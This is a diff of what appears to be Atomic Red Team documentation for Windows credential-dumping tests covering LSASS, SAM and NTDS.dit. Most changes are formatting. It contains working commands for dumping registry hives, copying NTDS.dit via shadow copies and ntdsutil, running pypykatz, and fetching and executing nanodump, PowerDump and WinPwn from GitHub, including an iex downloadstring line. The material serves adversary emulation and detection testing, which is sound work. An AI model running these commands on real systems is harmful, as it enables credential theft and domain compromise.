+
 ```powershell
 Remove-Item $env:TEMP\t1003.001-13-rdrleakdiag -Recurse -Force -ErrorAction Ignore
 ```
+### Atomic Test #14: Dump LSASS.exe Memory through Silent Process Exit

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #14 - Dump LSASS.exe Memory through Silent Process Exit
 WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a 
 memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism 
 introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger
@@ -737,47 +613,41 @@ Upon successful execution, you should find the dump file in directory of your ch

 **Supported Platforms:** Windows

+**auto_generated_guid:** `eb5adf16-b601-4926-bca7-dad22adffb37`

-**auto_generated_guid:** eb5adf16-b601-4926-bca7-dad22adffb37
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_folder | Folder Path where resulting dump should be placed | path | %temp%&#92;SilentProcessExit|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 rmdir "#{output_folder}" /s /q >nul 2> nul
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
 ```

-
-
-
-<br/>
@@ -1,54 +1,44 @@
 # T1003.002 - OS Credential Dumping: Security Account Manager
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/002)
-<blockquote>

-Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
+## Description from ATT&CK

-A number of tools can be used to retrieve the SAM file through in-memory techniques:
+> Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
+> 
+> A number of tools can be used to retrieve the SAM file through in-memory techniques:
+> 
+> * pwdumpx.exe
+> * [gsecdump](https://attack.mitre.org/software/S0008)
+> * [Mimikatz](https://attack.mitre.org/software/S0002)
+> * secretsdump.py
+> 
+> Alternatively, the SAM can be extracted from the Registry with Reg:
+> 
+> * <code>reg save HKLM\sam sam</code>
+> * <code>reg save HKLM\system system</code>
+> 
+> Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
+> 
+> Notes:
+> 
+> * RID 500 account is the local, built-in administrator.
+> * RID 501 is the guest account.
+> * User accounts start with a RID of 1,000+.

-* pwdumpx.exe
-* [gsecdump](https://attack.mitre.org/software/S0008)
-* [Mimikatz](https://attack.mitre.org/software/S0002)
-* secretsdump.py
-
-Alternatively, the SAM can be extracted from the Registry with Reg:
-
-* <code>reg save HKLM\sam sam</code>
-* <code>reg save HKLM\system system</code>
-
-Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
-
-Notes: 
-
-* RID 500 account is the local, built-in administrator.
-* RID 501 is the guest account.
-* User accounts start with a RID of 1,000+.
-
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1003/002)

 ## Atomic Tests

- [Atomic Test #1 - Registry dump of SAM, creds, and secrets](#atomic-test-1---registry-dump-of-sam-creds-and-secrets)
+- [Atomic Test #1: Registry dump of SAM, creds, and secrets](#atomic-test-1-registry-dump-of-sam-creds-and-secrets)
+- [Atomic Test #2: Registry parse with pypykatz](#atomic-test-2-registry-parse-with-pypykatz)
+- [Atomic Test #3: esentutl.exe SAM copy](#atomic-test-3-esentutlexe-sam-copy)
+- [Atomic Test #4: PowerDump Hashes and Usernames from Registry](#atomic-test-4-powerdump-hashes-and-usernames-from-registry)
+- [Atomic Test #5: dump volume shadow copy hives with certutil](#atomic-test-5-dump-volume-shadow-copy-hives-with-certutil)
+- [Atomic Test #6: dump volume shadow copy hives with System.IO.File](#atomic-test-6-dump-volume-shadow-copy-hives-with-systemiofile)
+- [Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7-winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
+- [Atomic Test #8: Dumping of SAM, creds, and secrets(Reg Export)](#atomic-test-8-dumping-of-sam-creds-and-secretsreg-export)

- [Atomic Test #2 - Registry parse with pypykatz](#atomic-test-2---registry-parse-with-pypykatz)
+### Atomic Test #1: Registry dump of SAM, creds, and secrets

- [Atomic Test #3 - esentutl.exe SAM copy](#atomic-test-3---esentutlexe-sam-copy)
-
- [Atomic Test #4 - PowerDump Hashes and Usernames from Registry](#atomic-test-4---powerdump-hashes-and-usernames-from-registry)
-
- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil)
-
- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
-
- [Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7---winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
-
- [Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)](#atomic-test-8---dumping-of-sam-creds-and-secretsreg-export)
-
-
-<br/>
-
-## Atomic Test #1 - Registry dump of SAM, creds, and secrets
 Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
 via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

@@ -56,16 +46,9 @@ Upon successful execution of this test, you will find three files named, sam, sy

 **Supported Platforms:** Windows

+**auto_generated_guid:** `5c2571d0-1572-416d-9676-812e64ca9f44`

-**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 reg save HKLM\sam %temp%\sam
@@ -73,142 +56,119 @@ reg save HKLM\system %temp%\system
 reg save HKLM\security %temp%\security
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del %temp%\sam >nul 2> nul
 del %temp%\system >nul 2> nul
 del %temp%\security >nul 2> nul
 ```
+### Atomic Test #2: Registry parse with pypykatz

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Registry parse with pypykatz
 Parses registry hives to obtain stored credentials.

 Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `a96872b2-cbf3-46cf-8eb4-27e8c0e85263`

-**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_002|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 "#{venv_path}\Scripts\pypykatz" live lsa
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Computer must have python 3 installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
+
 ##### Description: Computer must have venv configured at #{venv_path}
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 py -m venv "#{venv_path}"
 ```
+
 ##### Description: pypykatz must be installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
 ```

+### Atomic Test #3: esentutl.exe SAM copy

-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - esentutl.exe SAM copy
 Copy the SAM hive using the esentutl.exe utility
 This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `a90c2f4d-6726-444e-99d2-a00cd7c20480`

-**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM|
 | file_name | Name of the copied file | string | SAM|
 | copy_dest | Destination of the copied file | string | %temp%|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del #{copy_dest}\#{file_name} >nul 2>&1
 ```
+### Atomic Test #4: PowerDump Hashes and Usernames from Registry

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - PowerDump Hashes and Usernames from Registry
 Executes a hashdump by reading the hashes from the registry.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `804f28fc-68fc-40da-b5a2-e9d0bce5c193`

-**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
@@ -217,86 +177,66 @@ Invoke-PowerDump
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: PowerDump script must exist on disk at specified location
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
 Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
 ```

+### Atomic Test #5: dump volume shadow copy hives with certutil

-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - dump volume shadow copy hives with certutil
 Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
 This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `eeb9751a-d598-42d3-b11c-c122d9c3f6c7`

-**auto_generated_guid:** eeb9751a-d598-42d3-b11c-c122d9c3f6c7
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_hive | Hive you wish to dump | string | SAM|
 | limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
 ```
+### Atomic Test #6: dump volume shadow copy hives with System.IO.File

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
 Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `9d77fed7-05f8-476e-a81b-8ff0472c64d0`

-**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_hive | Hive you wish to dump | string | SAM|
 | limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 1..#{limit} | % { 
@@ -305,65 +245,38 @@ Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https
 }
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 1..#{limit} | % {
  rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
 }
 ```
+### Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
 Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn

 **Supported Platforms:** Windows

+**auto_generated_guid:** `0c0f5f06-166a-4f4d-bb4a-719df9a01dbb`

-**auto_generated_guid:** 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 samfile -consoleoutput -noninteractive
 ```

+### Atomic Test #8: Dumping of SAM, creds, and secrets(Reg Export)

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)
 Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
 Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `21df41be-cdd8-4695-a650-c3981113aa3c`

-**auto_generated_guid:** 21df41be-cdd8-4695-a650-c3981113aa3c
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 reg export HKLM\sam %temp%\sam
@@ -371,15 +284,10 @@ reg export HKLM\system %temp%\system
 reg export HKLM\security %temp%\security
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del %temp%\sam >nul 2> nul
 del %temp%\system >nul 2> nul
 del %temp%\security >nul 2> nul
 ```
-
-
-
-
-
-<br/>
@@ -1,92 +1,75 @@
 # T1003.003 - OS Credential Dumping: NTDS
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/003)
-<blockquote>

-Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
+## Description from ATT&CK

-In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
+> Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
+> 
+> In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
+> 
+> The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
+> 
+> * Volume Shadow Copy
+> * secretsdump.py
+> * Using the in-built Windows tool, ntdsutil.exe
+> * Invoke-NinjaCopy

-The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
-
-* Volume Shadow Copy
-* secretsdump.py
-* Using the in-built Windows tool, ntdsutil.exe
-* Invoke-NinjaCopy
-
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1003/003)

 ## Atomic Tests

- [Atomic Test #1 - Create Volume Shadow Copy with vssadmin](#atomic-test-1---create-volume-shadow-copy-with-vssadmin)
+- [Atomic Test #1: Create Volume Shadow Copy with vssadmin](#atomic-test-1-create-volume-shadow-copy-with-vssadmin)
+- [Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy](#atomic-test-2-copy-ntdsdit-from-volume-shadow-copy)
+- [Atomic Test #3: Dump Active Directory Database with NTDSUtil](#atomic-test-3-dump-active-directory-database-with-ntdsutil)
+- [Atomic Test #4: Create Volume Shadow Copy with WMI](#atomic-test-4-create-volume-shadow-copy-with-wmi)
+- [Atomic Test #5: Create Volume Shadow Copy remotely with WMI](#atomic-test-5-create-volume-shadow-copy-remotely-with-wmi)
+- [Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl](#atomic-test-6-create-volume-shadow-copy-remotely-wmi-with-esentutl)
+- [Atomic Test #7: Create Volume Shadow Copy with Powershell](#atomic-test-7-create-volume-shadow-copy-with-powershell)
+- [Atomic Test #8: Create Symlink to Volume Shadow Copy](#atomic-test-8-create-symlink-to-volume-shadow-copy)
+- [Atomic Test #9: Create Volume Shadow Copy with diskshadow](#atomic-test-9-create-volume-shadow-copy-with-diskshadow)
+- [Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing](#atomic-test-10-copy-ntds-in-low-level-ntfs-acquisition-via-mft-parsing)
+- [Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil](#atomic-test-11-copy-ntds-in-low-level-ntfs-acquisition-via-fsutil)

- [Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-2---copy-ntdsdit-from-volume-shadow-copy)
+### Atomic Test #1: Create Volume Shadow Copy with vssadmin

- [Atomic Test #3 - Dump Active Directory Database with NTDSUtil](#atomic-test-3---dump-active-directory-database-with-ntdsutil)
-
- [Atomic Test #4 - Create Volume Shadow Copy with WMI](#atomic-test-4---create-volume-shadow-copy-with-wmi)
-
- [Atomic Test #5 - Create Volume Shadow Copy remotely with WMI](#atomic-test-5---create-volume-shadow-copy-remotely-with-wmi)
-
- [Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl](#atomic-test-6---create-volume-shadow-copy-remotely-wmi-with-esentutl)
-
- [Atomic Test #7 - Create Volume Shadow Copy with Powershell](#atomic-test-7---create-volume-shadow-copy-with-powershell)
-
- [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy)
-
- [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)
-
-
-<br/>
-
-## Atomic Test #1 - Create Volume Shadow Copy with vssadmin
 This test is intended to be run on a domain Controller.

 The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f`

-**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | string | C:|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 vssadmin.exe create shadow /for=#{drive_letter}
 ```


+#### Dependencies: Run with `command_prompt`!

-
-#### Dependencies:  Run with `command_prompt`!
 ##### Description: Target must be a Domain Controller
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```cmd
 reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```cmd
 echo Sorry, Promoting this machine to a Domain Controller must be done manually
 ```

+### Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy
 This test is intended to be run on a domain Controller.

 The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -97,22 +80,16 @@ This test must be executed on a Windows Domain Controller.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `c6237146-9ea6-4711-85c9-c56d263a6b03`

-**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | vsc_name | Name of Volume Shadow Copy | string | &#92;&#92;?&#92;GLOBALROOT&#92;Device&#92;HarddiskVolumeShadowCopy1|
 | extract_path | Path for extracted NTDS.dit | path | C:&#92;Windows&#92;Temp|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
@@ -120,51 +97,60 @@ copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
 reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del "#{extract_path}\ntds.dit"        >nul 2> nul
 del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
 del "#{extract_path}\SYSTEM_HIVE"     >nul 2> nul
 ```

+#### Dependencies: Run with `command_prompt`!

-
-#### Dependencies:  Run with `command_prompt`!
 ##### Description: Target must be a Domain Controller
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```cmd
 reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```cmd
 echo Sorry, Promoting this machine to a Domain Controller must be done manually
 ```
+
 ##### Description: Volume shadow copy must exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```cmd
 if not exist #{vsc_name} (exit /b 1)
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```cmd
 echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'" to fulfill this requirement
 ```
+
 ##### Description: Extract path must exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```cmd
 if not exist #{extract_path} (exit /b 1)
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```cmd
 mkdir #{extract_path}
 ```

+### Atomic Test #3: Dump Active Directory Database with NTDSUtil

-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Dump Active Directory Database with NTDSUtil
 This test is intended to be run on a domain Controller.

 The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
@@ -175,295 +161,290 @@ Upon successful completion, you will find a copy of the ntds.dit file in the C:\

 **Supported Platforms:** Windows

+**auto_generated_guid:** `2364e33d-ceab-4641-8468-bfb1d7cc2723`

-**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_folder | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;ntds_T1003|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 mkdir #{output_folder}
 ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 rmdir /q /s #{output_folder} >nul 2>&1
 ```

+#### Dependencies: Run with `command_prompt`!

-
-#### Dependencies:  Run with `command_prompt`!
 ##### Description: Target must be a Domain Controller
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```cmd
 reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```cmd
 echo Sorry, Promoting this machine to a Domain Controller must be done manually
 ```

+### Atomic Test #4: Create Volume Shadow Copy with WMI

-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Create Volume Shadow Copy with WMI
 This test is intended to be run on a domain Controller.

 The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `224f7de0-8f0a-4a94-b5d8-989b036c86da`

-**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon and backslash) | string | C:&#92;|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 wmic shadowcopy call create Volume=#{drive_letter}
 ```


+#### Dependencies: Run with `command_prompt`!

-
-#### Dependencies:  Run with `command_prompt`!
 ##### Description: Target must be a Domain Controller
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```cmd
 reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```cmd
 echo Sorry, Promoting this machine to a Domain Controller must be done manually
 ```

+### Atomic Test #5: Create Volume Shadow Copy remotely with WMI

-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Create Volume Shadow Copy remotely with WMI
 This test is intended to be run from a remote workstation with domain admin context.
 The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `d893459f-71f0-484d-9808-ec83b2b64226`

-**auto_generated_guid:** d893459f-71f0-484d-9808-ec83b2b64226
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon and backslash) | string | C:&#92;|
 | target_host | IP Address / Hostname you want to target | string | localhost|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
 ```


+#### Dependencies: Run with `command_prompt`!

-
-#### Dependencies:  Run with `command_prompt`!
 ##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```cmd
 wmic /node:"#{target_host}" shadowcopy list brief
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```cmd
 echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
 ```

+### Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl

-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl
 This test is intended to be run from a remote workstation with domain admin context.
 The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.

